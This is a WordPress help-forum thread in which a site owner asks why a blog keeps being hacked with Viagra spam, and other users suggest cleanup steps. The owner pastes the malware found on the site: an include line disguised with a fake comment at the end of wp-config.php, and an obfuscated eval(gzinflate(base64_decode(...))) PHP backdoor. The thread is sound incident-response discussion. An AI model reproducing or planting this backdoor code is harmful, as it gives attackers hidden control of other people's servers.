WordPress Keeps Being Hacked!

Are you using Bad Behavior and Spam Karma?

Sounds to me like your server has a rootkit installed.

Is this your server? or is this on a host provider?

Not sure what a rootkit is..

This is my dedicated server, hosted with gigenet.

Not using bad behavior or spam karma.. but im guessing if the other plugins cant stop this, then they may be similar.

Ok, not sure if i found the problem or not. I was looking in my wp-config.php file and found the following at the end, which was different to the normal template:

/**
 * Retrieve the name of the highest priority template file that exists.
 *
 * Searches in the STYLESHEETPATH before TEMPLATEPATH so that themes which
 * inherit from a parent theme can just overload one file.
 *
 * @since 2.7.0 */
include_once('wp-template.php');

?>

I went to wp-template.php in my blog folder and it had the following crap:

<?
eval(gzinflate(base64_decode('tVXbbttGEH0PkH8gAgGkYI1kt3F6g4AErQIHSOOElvrSBMR4ORQ34u4Su0vRQuB/7ywp+dLElgK0eqCWM2fOmZtWg1zaaBq/+Pn56U8/Po9/e/pkUOOSXDSN4rZtx60l5yupl0D5ksbCqKdPvm2fKIWgqXV7AZNLa8QKKnIarWPTlYemEFDIZekBlyi18+BK1AQCbSs1f2lBVUX5uPSq2q8gyiYoyDznKECdQ3AxhMAb8CWBk6p2Rjt+kQ5co3PcgA4ZPC7hCK0oJyvm3Rz1T40ryvcFKClWko4+oyJ3hM4d1VI83ConPT3qnGC+Juulexh2a6rrNdfOeJ7sAfC1zMk8nFvb0q7JG43A00H4jDVqKJGbbQoouEho6hw9gdHQl+44hUZ7uwHVOClAGUuPt/pGyGILSxN83fAsEZSm4dXpg0ihlgg/HJ+cQGUEehlED6d3tZEVWXAKxSo3rQaqpJK6JxIlqkv2KvSiBEtrwr17eEMdNq1b9lJq7wA9BJcl31gNDjcOGNBi8HFpuenS5hK5mcuGablOfnD9B+qFw20ZaxdCQ2OOOQvMg8a9ljlv7IapiKdYmP0abG0q38sE5u07GOFN6NGpL1nt+JfvZDIbrMA26rKiPtmwsFvElircTNHu85LWWCUvC55atiSfCaM9cQ+TuPS+/nUyCR5ewIprZsWxEJN4POCbbhzzQeWnSXfJDYfDu6z8GYissVW4+76PiGl2F+eUrhieU/Lso/2on416a0AMmHrqrVSJ8zazVFcoKOlu2XgUx6NBdjFL/5qlf8dn8/n77Oz8Yh5/Gt9a09mHxexini3SN/Gn4Q3jPbJJz8T24C94mVCUyfZKRxf16X7pqu7OjybUN6nvkSyipNP7pmCP/LLrpiwSqWWYTRLznWDa0NasMDXpeDidntwi/59pXu8OVDm6q8WJFY0W4Yed0ZV0QUWE3DhdHw/v5dXtQ8nLcANI/sN9uUvTCTjyp ovYJS46i3xfp2/P3YdRvR1uRg2POZq/+mKWj6PjgiHQ2X6Tv5umrdxevQ6S3zeEpzt/8OTtfzEfRyVeCA/4DQG5OH0xXJELov1H9+DvsPdf1V8O85G1e9RC2Xf8D')));
?>

Deleted the lines out of the config file and the template file, but still not sure if this will be enough, or if it was the backdoor in question..

I am going to do another clean and sweep of the DB tonight, but in the mean time I’m stumped again.

I have cleaned and gone over my site searching for traces of the keyword ‘viagra’ and ‘base_64’ run exploit scanner, checked config, settings, theme files etc. which is where the hacks usually are, and nothing. Also checked .htaccess and through files/folders for malicious files but no luck.

However, this is the first time I’ve removed everything and google is STILL caching my website as a viagra site. See: https://www.google.co.uk/search?hl=en&source=hp&q=wrestling-edge&btnG=Google+Search&meta=&aq=f&oq=

I even made the files that are constantly getting hacked, immutable.

Does anyone have any clue? I can’t see any clues in the source code of the cached viagra website either.

I’m so sick of this.

Have you ever found any php files tucked away deep, like in your uploads folder, or even somewhere else on your server? I mentioned looking for rogue files earlier in the thread…never really heard back from you on the result.

This talks about how I cleaned my install:
https://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

And here is a different post I just made for someone specifically, but it goes a bit more in depth about using your access logs to find and delete php files that don’t belong:
https://www.rvoodoo.com/2010/03/using-access-logs-to-find-rogue-files-when-wordpress-is-hacked/

Hi RVoodoo,

I’ve checked all folders for trace of rogue files… I probably need to do it thoroughly again, but I deleted any thing suspicious or anything i didnt use. I pretty much deleted ANYTHING that was redundant on the Website..

Access logs and error logs haven’t really given me any information at all unfortunately.

Can’t believe how long this has gone on and it’s really hurt my traffic.

so…when your file was altered, and you checked the access logs for activity to the altered file at the exact time shown by the timestamp of the altered file, what did it show?

Not the IP address, but the whole line, especially the second url/path that may be referenced at the end of the entry?

Did you run this one on your local workstation and on the friends workstation?
https://www.malwarebytes.org/

henkholland – yes, our computers are malware free.

RVoodoo.. generally these files magically appear on the server, but their last modified date is in the past. FTP logs show nothing apart from my IP editing a bunch of files. It has no useful information in there. Modified dates never match up against access_logs either.. it’s hopeless. I’ve tried that method.